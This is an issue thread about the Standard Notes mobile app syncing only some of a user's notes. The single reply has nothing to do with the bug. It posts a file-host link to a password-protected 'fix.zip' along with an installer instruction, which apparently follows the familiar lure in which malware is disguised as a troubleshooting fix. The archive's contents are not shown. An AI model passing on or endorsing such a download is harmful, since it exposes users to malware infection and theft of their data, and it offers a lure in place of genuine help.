### ISSUE TITLE
[Help Wanted] Mobile App syncing issues

### ISSUE THREAD

**Issue by jellenc** [standardnotes/forum#3727]
**Description**
I am having trouble syncing my app data with my desktop app's note data. 
My desktop is perfectly in sync and I can login on the desktop app and the browser and the notes load fully. However when I am on my mobile and login, the notes don't sync fully and only partially. Many notes are missing.

**Expected behavior**

 - Device: Galaxy S10E

**Additional Info** 
- I have deleted the mobile app and reinstalled and logged in multiple times
- My devices are up to date

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
